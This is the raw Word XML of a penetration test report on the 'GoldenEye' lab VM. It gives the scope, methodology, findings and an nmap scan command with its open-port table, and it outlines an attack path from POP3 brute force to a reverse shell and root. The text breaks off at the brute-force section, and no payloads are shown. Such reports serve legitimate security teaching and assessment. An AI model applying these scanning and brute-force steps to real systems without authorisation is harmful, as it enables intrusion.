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89AE9" w14:textId="0F97495D" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>GoldenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B8388" w14:textId="7F69DE94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 xml:space="preserve">Author: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ANIKET MISRA, PENETRATION TESTER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1DCA9" w14:textId="769E5B53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 xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>23-03-2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730B1A94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pict w14:anchorId="07EBF543">
          <v:rect id="_x0000_i1163" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C07A225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1. Engagement Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE41B05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1.1 Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18ED3D6D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t>The objective of this assessment was to identify security weaknesses in the target system and demonstrate the impact of exploitation through controlled penetration testing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A3153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pict w14:anchorId="022CB1A2">
          <v:rect id="_x0000_i1164" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2315DD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1.2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1849"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="65B74B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AC1E4" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28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37BCEC05" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="295D8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41F0F" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>GoldenEye</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB85339" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>192.168.56.101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03A59836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pict w14:anchorId="07A7405D">
          <v:rect id="_x0000_i1165" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCF084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1.3 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33A178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t>The following methodology was used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C61DD6" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09736FC8" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C93F611" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Identification </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4353BCAC" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79EBCC" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657DEBB" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14087BE3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pict w14:anchorId="365CDF38">
          <v:rect id="_x0000_i1166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24855FAD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2. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB429C5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t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>GoldenEye</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> system was </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>fully compromised</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>, resulting in root-level access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B32DB4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Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ED22A4" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Weak credential management allowed brute-force attacks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0956B5AA" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sensitive credentials exposed via internal email </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83E431" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Web application (Moodle) allowed code execution </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D616CD" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">System vulnerable to kernel privilege escalation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243578A3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Business Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3261C79A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t>An attacker can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C33363C" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Gain unauthorized access to internal systems </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B48D18" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute arbitrary commands remotely </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40957768" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalate privileges to root </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112B8A2" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Exfiltrate sensitive data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0641EF41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 xml:space="preserve">Overall Risk Rating: </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>🔴</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A844045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pict w14:anchorId="23EC30FE">
          <v:rect id="_x0000_i1167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA25EA0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3. Attack Path Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614E583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t xml:space="preserve">External Recon → POP3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Email Access</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>→ Credential Disclosure → Moodle Access</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>→ Stored Injection → Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>→ Privilege Escalation → Root Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB58DB6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pict w14:anchorId="372039AB">
          <v:rect id="_x0000_i1168" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="720A3EA7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4. Technical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E128E13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pict w14:anchorId="6A513434">
          <v:rect id="_x0000_i1169" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4670D1" w14:textId="1D948219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4.1 Open Services Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7764A622" wp14:editId="1D71B113">
            <wp:extent cx="3291840" cy="1604708"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="7159381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029" cy="1624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116B0" w14:textId="0862F58B" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E304915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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D70A13D" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- --min-rate=300 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E68FAD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Findings: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895"/>
        <w:gridCol w:w="1554"/>
      </w:tblGrid>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="2DF0BF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22DCFA" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28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08449D8" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28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E11DA4F" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="75590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E5655" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28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D72B865" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>SMTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1518D967" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Postfix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="5C634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4B68C" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28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082BFF97" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28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1AF8F888" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Apache 2.4.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="62A58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A1DDC" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>55006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A187B81" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>POP3S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4846E3FF" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Dovecot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w14:paraId="77AD5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D4206" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>55007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D2A8126" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>POP3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A965A6" w14:textId="77777777" w:rsidR="007B3FC5" w:rsidRPr="007B3FC5" w:rsidRDefault="007B3FC5" w:rsidP="007B3FC5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B3FC5">
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>Dovecot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5033FBCC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pict w14:anchorId="484C9BFC">
          <v:rect id="_x0000_i1170" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="754FA6C9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4.2 Weak Credentials &amp; Brute Force (POP3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBE5985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Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207CF765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t>POP3 service allowed brute-force attempts without lockout or throttling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB755E9" w14:textId="797D4B73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Command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007B3FC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B986068" wp14:editId="470ECA3F">
